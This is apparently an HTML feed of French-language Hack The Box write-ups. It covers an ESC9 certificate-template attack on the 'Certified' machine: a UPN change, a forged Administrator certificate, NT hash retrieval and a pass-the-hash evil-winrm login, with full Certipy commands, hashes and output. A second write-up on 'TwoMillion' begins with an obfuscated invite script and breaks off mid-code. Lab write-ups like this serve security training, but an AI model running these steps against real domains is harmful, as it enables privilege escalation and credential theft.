class="s1">&#39;CERTIFIED.HTB&#39;</span> from cache: 10.10.11.41 </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Authenticating to LDAP server </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Bound to ldaps://10.10.11.41:636 - ssl </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Default path: <span class="nv">DC</span><span class="o">=</span>certified,DC<span class="o">=</span>htb </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Configuration path: <span class="nv">CN</span><span class="o">=</span>Configuration,DC<span class="o">=</span>certified,DC<span class="o">=</span>htb </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Adding Domain Computers to list of current user<span class="s1">&#39;s SIDs </span></span></span><span class="line"><span class="cl"><span class="s1">[+] List of current user&#39;</span>s SIDs: </span></span><span class="line"><span class="cl"> CERTIFIED.HTB<span class="se">\D</span>omain Users <span class="o">(</span>S-1-5-21-729746778-2675978091-3820388244-513<span class="o">)</span> </span></span><span class="line"><span class="cl"> CERTIFIED.HTB<span class="se">\A</span>uthenticated Users <span class="o">(</span>CERTIFIED.HTB-S-1-5-11<span class="o">)</span> </span></span><span class="line"><span class="cl"> CERTIFIED.HTB<span class="se">\D</span>omain Computers <span class="o">(</span>S-1-5-21-729746778-2675978091-3820388244-515<span class="o">)</span> </span></span><span class="line"><span class="cl"> CERTIFIED.HTB<span class="se">\E</span>veryone <span class="o">(</span>CERTIFIED.HTB-S-1-1-0<span class="o">)</span> </span></span><span class="line"><span class="cl"> CERTIFIED.HTB<span class="se">\o</span>perator ca <span class="o">(</span>S-1-5-21-729746778-2675978091-3820388244-1106<span class="o">)</span> </span></span><span class="line"><span class="cl"> CERTIFIED.HTB<span class="se">\U</span>sers <span class="o">(</span>CERTIFIED.HTB-S-1-5-32-545<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Finding certificate templates </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Found <span class="m">34</span> certificate templates </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Finding certificate authorities </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Found <span class="m">1</span> certificate authority </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Found <span class="m">12</span> enabled certificate templates </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Trying to resolve <span class="s1">&#39;DC01.certified.htb&#39;</span> at <span class="s1">&#39;10.0.2.3&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> Failed to resolve: DC01.certified.htb </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Trying to get CA configuration <span class="k">for</span> <span class="s1">&#39;certified-DC01-CA&#39;</span> via CSRA </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Trying to get DCOM connection <span class="k">for</span>: DC01.certified.htb </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> Got error <span class="k">while</span> trying to get CA configuration <span class="k">for</span> <span class="s1">&#39;certified-DC01-CA&#39;</span> via CSRA: <span class="o">[</span>Errno -2<span class="o">]</span> Name or service not known </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Trying to get CA configuration <span class="k">for</span> <span class="s1">&#39;certified-DC01-CA&#39;</span> via RRP </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> Got error <span class="k">while</span> trying to get CA configuration <span class="k">for</span> <span class="s1">&#39;certified-DC01-CA&#39;</span> via RRP: <span class="o">[</span>Errno Connection error <span class="o">(</span>DC01.certified.htb:445<span class="o">)]</span> <span class="o">[</span>Errno -2<span class="o">]</span> Name or service not known </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> Failed to get CA configuration <span class="k">for</span> <span class="s1">&#39;certified-DC01-CA&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Trying to resolve <span class="s1">&#39;DC01.certified.htb&#39;</span> at <span class="s1">&#39;10.0.2.3&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> Failed to resolve: DC01.certified.htb </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Connecting to DC01.certified.htb:80 </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> Got error <span class="k">while</span> trying to check <span class="k">for</span> web enrollment: <span class="o">[</span>Errno -2<span class="o">]</span> Name or service not known </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Enumeration output: </span></span><span class="line"><span class="cl">Certificate Authorities </span></span><span class="line"><span class="cl"> <span class="m">0</span> </span></span><span class="line"><span class="cl"> CA Name : certified-DC01-CA </span></span><span class="line"><span class="cl"> DNS Name : DC01.certified.htb </span></span><span class="line"><span class="cl"> Certificate Subject : <span class="nv">CN</span><span class="o">=</span>certified-DC01-CA, <span class="nv">DC</span><span class="o">=</span>certified, <span class="nv">DC</span><span class="o">=</span>htb </span></span><span class="line"><span class="cl"> Certificate Serial Number : 36472F2C180FBB9B4983AD4D60CD5A9D </span></span><span class="line"><span class="cl"> Certificate Validity Start : 2024-05-13 15:33:41+00:00 </span></span><span class="line"><span class="cl"> Certificate Validity End : 2124-05-13 15:43:41+00:00 </span></span><span class="line"><span class="cl"> Web Enrollment : Disabled </span></span><span class="line"><span class="cl"> User Specified SAN : Unknown </span></span><span class="line"><span class="cl"> Request Disposition : Unknown </span></span><span class="line"><span class="cl"> Enforce Encryption <span class="k">for</span> Requests : Unknown </span></span><span class="line"><span class="cl">Certificate Templates </span></span><span class="line"><span class="cl"> <span class="m">0</span> </span></span><span class="line"><span class="cl"> Template Name : CertifiedAuthentication </span></span><span class="line"><span class="cl"> Display Name : Certified Authentication </span></span><span class="line"><span class="cl"> Certificate Authorities : certified-DC01-CA </span></span><span class="line"><span class="cl"> Enabled : True </span></span><span class="line"><span class="cl"> Client Authentication : True </span></span><span class="line"><span class="cl"> Enrollment Agent : False </span></span><span class="line"><span class="cl"> Any Purpose : False </span></span><span class="line"><span class="cl"> Enrollee Supplies Subject : False </span></span><span class="line"><span class="cl"> Certificate Name Flag : SubjectRequireDirectoryPath </span></span><span class="line"><span class="cl"> SubjectAltRequireUpn </span></span><span class="line"><span class="cl"> Enrollment Flag : NoSecurityExtension </span></span><span class="line"><span class="cl"> AutoEnrollment </span></span><span class="line"><span class="cl"> PublishToDs </span></span><span class="line"><span class="cl"> Private Key Flag : <span class="m">16842752</span> </span></span><span class="line"><span class="cl"> Extended Key Usage : Server Authentication </span></span><span class="line"><span class="cl"> Client Authentication </span></span><span class="line"><span class="cl"> Requires Manager Approval : False </span></span><span class="line"><span class="cl"> Requires Key Archival : False </span></span><span class="line"><span class="cl"> Authorized Signatures Required : <span class="m">0</span> </span></span><span class="line"><span class="cl"> Validity Period : <span class="m">1000</span> years </span></span><span class="line"><span class="cl"> Renewal Period : <span class="m">6</span> weeks </span></span><span class="line"><span class="cl"> Minimum RSA Key Length : <span class="m">2048</span> </span></span><span class="line"><span class="cl"> Permissions </span></span><span class="line"><span class="cl"> Enrollment Permissions </span></span><span class="line"><span class="cl"> Enrollment Rights : CERTIFIED.HTB<span class="se">\o</span>perator ca </span></span><span class="line"><span class="cl"> CERTIFIED.HTB<span class="se">\D</span>omain Admins </span></span><span class="line"><span class="cl"> CERTIFIED.HTB<span class="se">\E</span>nterprise Admins </span></span><span class="line"><span class="cl"> Object Control Permissions </span></span><span class="line"><span class="cl"> Owner : CERTIFIED.HTB<span class="se">\A</span>dministrator </span></span><span class="line"><span class="cl"> Write Owner Principals : CERTIFIED.HTB<span class="se">\D</span>omain Admins </span></span><span class="line"><span class="cl"> CERTIFIED.HTB<span class="se">\E</span>nterprise Admins </span></span><span class="line"><span class="cl"> CERTIFIED.HTB<span class="se">\A</span>dministrator </span></span><span class="line"><span class="cl"> Write Dacl Principals : CERTIFIED.HTB<span class="se">\D</span>omain Admins </span></span><span class="line"><span class="cl"> CERTIFIED.HTB<span class="se">\E</span>nterprise Admins </span></span><span class="line"><span class="cl"> CERTIFIED.HTB<span class="se">\A</span>dministrator </span></span><span class="line"><span class="cl"> Write Property Principals : CERTIFIED.HTB<span class="se">\D</span>omain Admins </span></span><span class="line"><span class="cl"> CERTIFIED.HTB<span class="se">\E</span>nterprise Admins </span></span><span class="line"><span class="cl"> CERTIFIED.HTB<span class="se">\A</span>dministrator </span></span><span class="line"><span class="cl"> <span class="o">[</span>!<span class="o">]</span> Vulnerabilities </span></span><span class="line"><span class="cl"> ESC9 : <span class="s1">&#39;CERTIFIED.HTB\\operator ca&#39;</span> can enroll and template has no security extension </span></span></code></pre></td></tr></table> </div> </div><h3 id="exploit-esc9-vulnerability">Exploit ESC9 vulnerability </h3><p>#### Modifying the userPrincipalName (UPN) attribute of ca_operator <strong>management_svc</strong> modifie l’UPN de <strong>ca_operator</strong> (son identifiant d’utilisateur principal) pour qu’il corresponde à Administrator (sans le domaine @corp.local). L’UPN modifié reste valide car il ne correspond pas exactement à celui d’Administrator (qui est <a class="link" href="mailto:Administrator@corp.local" >Administrator@corp.local</a>).</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">certipy-ad account update -username management_svc@certified.htb -hashes a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn Administrator </span></span><span class="line"><span class="cl">Certipy v4.8.2 - by Oliver Lyak <span class="o">(</span>ly4k<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Updating user <span class="s1">&#39;ca_operator&#39;</span>: </span></span><span class="line"><span class="cl"> userPrincipalName : Administrator </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Successfully updated <span class="s1">&#39;ca_operator&#39;</span> </span></span></code></pre></td></tr></table> </div> </div><h4 id="requesting-certificate">Requesting Certificate </h4><ul> <li>management_svc demande un certificat en se faisant passer pour ca_operator, mais avec l’UPN modifié à Administrator.</li> <li>Le modèle de certificat ESC9 (mal configuré) permet d’émettre un certificat sans inclure de sécurité supplémentaire (par exemple, des extensions empêchant les abus).</li> </ul> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">certipy-ad req -username ca_operator@certified.htb -hashes 94994b74f29662fc4d702f2f3b0df327 -ca certified-DC01-CA -template CertifiedAuthentication </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">/usr/lib/python3/dist-packages/certipy/commands/req.py:459: SyntaxWarning: invalid escape sequence <span class="s1">&#39;\(&#39;</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;(0x[a-zA-Z0-9]+) \([-]?[0-9]+ &#34;</span>, </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Requesting certificate via RPC </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Successfully requested certificate </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Request ID is <span class="m">23</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Got certificate with UPN <span class="s1">&#39;Administrator&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Certificate has no object SID </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Saved certificate and private key to <span class="s1">&#39;administrator.pfx&#39;</span> </span></span></code></pre></td></tr></table> </div> </div><h4 id="restoring-the-upn-of-ca_operator">Restoring the UPN of ca_operator </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">certipy-ad account update -username management_svc@certified.htb -hashes a091c1832bcdd4677c28b5a6a1295584 -user <span class="s1">&#39;ca_operator&#39;</span> -upn <span class="s1">&#39;ca_operator@certified.htb&#39;</span> -debug </span></span><span class="line"><span class="cl">Certipy v4.8.2 - by Oliver Lyak <span class="o">(</span>ly4k<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Trying to resolve <span class="s1">&#39;CERTIFIED.HTB&#39;</span> at <span class="s1">&#39;10.0.2.3&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Resolved <span class="s1">&#39;CERTIFIED.HTB&#39;</span> from cache: 10.10.11.41 </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Authenticating to LDAP server </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Bound to ldaps://10.10.11.41:636 - ssl </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Default path: <span class="nv">DC</span><span class="o">=</span>certified,DC<span class="o">=</span>htb </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Configuration path: <span class="nv">CN</span><span class="o">=</span>Configuration,DC<span class="o">=</span>certified,DC<span class="o">=</span>htb </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Updating user <span class="s1">&#39;ca_operator&#39;</span>: </span></span><span class="line"><span class="cl"> userPrincipalName : ca_operator@certified.htb </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Successfully updated <span class="s1">&#39;ca_operator&#39;</span> </span></span></code></pre></td></tr></table> </div> </div><h4 id="retrieving-nt-hash-via-forged-certificate">Retrieving NT Hash via Forged Certificate </h4><p>Attempting authentication with the issued certificate now yields the NT hash of <a class="link" href="mailto:Administrator@corp.local" >Administrator@corp.local</a>. The command must include -domain <domain> due to the certificate&rsquo;s lack of domain specification:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span><span class="lnt">9 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">certipy-ad auth -pfx ./administrator.pfx -domain certified.htb </span></span><span class="line"><span class="cl">Certipy v4.8.2 - by Oliver Lyak <span class="o">(</span>ly4k<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Using principal: administrator@certified.htb </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Trying to get TGT... </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Got TGT </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Saved credential cache to <span class="s1">&#39;administrator.ccache&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Trying to retrieve NT <span class="nb">hash</span> <span class="k">for</span> <span class="s1">&#39;administrator&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Got <span class="nb">hash</span> <span class="k">for</span> <span class="s1">&#39;administrator@certified.htb&#39;</span>: aad3b435b51404eeaad3b435b51404ee:0d5b49608bbce1751f708748f67e2d34 </span></span></code></pre></td></tr></table> </div> </div><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">evil-winrm -i 10.10.11.41 -u Administrator -H 0d5b49608bbce1751f708748f67e2d34 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Evil-WinRM shell v3.7 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc<span class="o">()</span> <span class="k">function</span> is unimplemented on this machine </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Info: Establishing connection to remote endpoint </span></span><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>ocuments&gt; <span class="nb">cd</span> ../Desktop </span></span><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>esktop&gt; ls </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> Directory: C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>esktop </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Mode LastWriteTime Length Name </span></span><span class="line"><span class="cl">---- ------------- ------ ---- </span></span><span class="line"><span class="cl">-ar--- 12/10/2024 9:26 AM <span class="m">34</span> root.txt </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>esktop&gt; cat root.txt </span></span><span class="line"><span class="cl">dc1c.....fb35 </span></span></code></pre></td></tr></table> </div> </div>https://leopoldabgn.github.io/writeups/p/twomillion-htb/Sun, 08 Dec 2024 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/twomillion-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="TwoMillion cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">TwoMillion</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Linux</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.11.221</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Easy</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ nmap -sC -sV -An -p- 10.10.11.221 </span></span><span class="line"><span class="cl">Port <span class="m">80</span> -&gt; HTTP twomillion.htb </span></span></code></pre></td></tr></table> </div> </div><h3 id="etchosts">/etc/hosts </h3><p>On ajoute les noms de domaines necessaire. Un peu plus tard on découvrira qu&rsquo;il y a également le nom de domaine: <strong>data.analytical.htb</strong></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1">## ...</span> </span></span><span class="line"><span class="cl">10.10.11.221 twomillion.htb </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="invitation-code---inviteapi">Invitation code - inviteapi </h3><p>En utilisant Burp sur la page de login, on découvre un code javascript indiquant qu&rsquo;un compte peut etre créer a l&rsquo;aide d&rsquo;un code d&rsquo;Invitation En y découvre un lien vers un code javascript: <a class="link" href="http://2million.htb/js/inviteapi.min.js" target="_blank" rel="noopener" >http://2million.htb/js/inviteapi.min.js</a></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-js" data-lang="js"><span class="line"><span class="cl"><span class="nb">eval</span><span class="p">(</span><span class="kd">function</span><span class="p">(</span><span class="nx">p</span><span class="p">,</span> <span class="nx">a</span><span class="p">,</span> <span class="nx">c</span><span class="p">,</span> <span class="nx">k</span><span class="p">,</span> <span class="nx">e</span><span class="p">,</span> <span class="nx">d</span><span class="p">)</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nx">e</span> <span class="o">=</span> <span class="kd">function</span><span class="p">(</span><span class="nx">c</span><span class="p">)</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="nx">c</span><span class="p">.</span><span class="nx">toString</span><span class="p">(</span><span class="mi">36</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">};</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="s1">&#39;&#39;</span><span class="p">.</span><span class="nx">replace</span><span class="p">(</span><span class="sr">/^/</span><span class="p">,</span> <span class="nb">String</span><span class="p">))</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">while</span> <span class="p">(</span><span class="nx">c</span><span class="o">--</span><span class="p">)</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nx">d</span><span class="p">[</span><span class="nx">c</span><span class="p">.</span><span class="nx">toString</span><span class="p">(</span><span class="nx">a</span><span class="p">)]</span> <span class="o">=</span> <span class="nx">k</span><span class="p">[</span><span class="nx">c</span><span class="p">]</span> <span class="o">||</span> <span class="nx">c</span><span class="p">.</span><span class="nx">toString</span><span class="p">(</span><span class="nx">a</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="nx">k</span> <span class="o">=</span> <span class="p">[</span><span class="kd">function</span><span class="p">(</span><span class="nx">e</span><span class="p">)</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="nx">d</span><span class="p">[</span><span class="nx">e</span><span class="p">]</span> </span></span><span class="line"><span class="cl"> <span class="p">}];</span> </span></span><span class="line"><span class="cl"> <span class="nx">e</span> <span class="o">=</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="s1">&#39;\\w+&#39;</span> </span></span><span class="line"><span class="cl"> <span class="p">};</span> </span></span><span class="line"><span class="cl"> <span class="nx">c</span> <span class="o">=</span> <span class="mi">1</span> </span></span><span class="line"><span class="cl"> <span class="p">};</span> </span></span><span class="line"><span class="cl"> <span class="k">while</span> <span class="p">(</span><span class="nx">c</span><span class="o">--</span><span class="p">)</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="p">(</span><span class="nx">k</span><span class="p">[</span><span class="nx">c</span><span class="p">])</span> <span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="nx">p</span> <span class="o">=</span> <span class="nx">p</span><span class="p">.</span><span class="nx">replace</span><span class="p">(</span><span class="k">new</span> <span class="nb">RegExp</span><span class="p">(</span><span class="s1">&#39;\\b&#39;</span> <span class="o">+</span> <span class="nx">e</span><span class="p">(</span><span class="nx">c</span><span class="p">)</span> <span class="o">+</span> <span class="s1">&#39;\\b&#39;</span><span class="p">,</span> <span class="s1">&#39;g&#39;</span><span class="p">),</span> <span class="nx">k</span><span class="p">[</span><span class="nx">c</span><span class="p">])</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="nx">p</span> </span></span><span class="line"><span class="cl"><span class="p">}(</span><span class="s1">&#39;1 i(4){h 8={&#34;4&#34;:4};$.9({a:&#34;7&#34;,5:&#34;6&#34;,g:8,b:\&#39;/d/e/n\&#39;,c:1(0){3.2(0)},f:1(0){3.2(0)}})}1 j(){$.9({a:&#34;7&#34;,5:&#34;6&#34;,b:\&#39;/d/e/k/l/m\&#39;,c:1(0){3.2(0)},f:1(0){3.2(0)}})}&#39;</span><span class="p">,</span> <span class="mi">24</span><span class="p">,</span> <span class="mi">24</span><span class="p">,</span> <span class="s1">&#39;response|function|log|console|code|dataType|json|POST|formData|ajax|type|url|success|api/v1|invite|error|data|var|verifyInviteCode|makeInviteCode|how|to|generate|verify&#39;</span><span class="p">.</span><span class="nx">split</span><span class="p">(</span><span class="s1">&#39;|&#39;</span><span class="p">),</span> <span class="mi">0</span><span class="p">,</span> <span class="p">{}))</span> </span></span></code></pre></td></tr></table> </div> </div><p>Ce script contient du code obfusqué, qui indique qu&rsquo;une requete POST est possible vers : <strong>/api/v1/invite/how/to/generate</strong></p> <p>Pour génerer un code d&rsquo;invitation</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="k">function</span> verifyInviteCode<span class="o">(</span>code<span class="o">)</span> <span class="o">{</span> </span></span><span class="line"><span class="cl"> var <span class="nv">formData</span> <span class="o">=</span> <span class="o">{</span> <span class="s2">&#34;code&#34;</span>: code <span class="o">}</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> $.ajax<span class="o">({</span> </span></span><span class="line"><span class="cl"> type: <span class="s2">&#34;POST&#34;</span>, </span></span><span class="line"><span class="cl"> dataType: <span class="s2">&#34;json&#34;</span>, </span></span><span class="line"><span class="cl"> data: formData, </span></span><span class="line"><span class="cl"> url: <span class="s1">&#39;/api/v1/invite/verify&#39;</span>, </span></span><span class="line"><span class="cl"> success: <span class="k">function</span> <span class="o">(</span>response<span class="o">)</span> <span class="o">{</span> </span></span><span class="line"><span class="cl"> console.log<span class="o">(</span>response<span class="o">)</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="o">}</span>, </span></span><span class="line"><span class="cl"> error: <span class="k">function</span> <span class="o">(</span>response<span class="o">)</span> <span class="o">{</span> </span></span><span class="line"><span class="cl"> console.log<span class="o">(</span>response<span class="o">)</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="o">}</span> </span></span><span class="line"><span class="cl"> <span class="o">})</span><span class="p">;</span> </span></span><span class="line"><span class="cl"><span 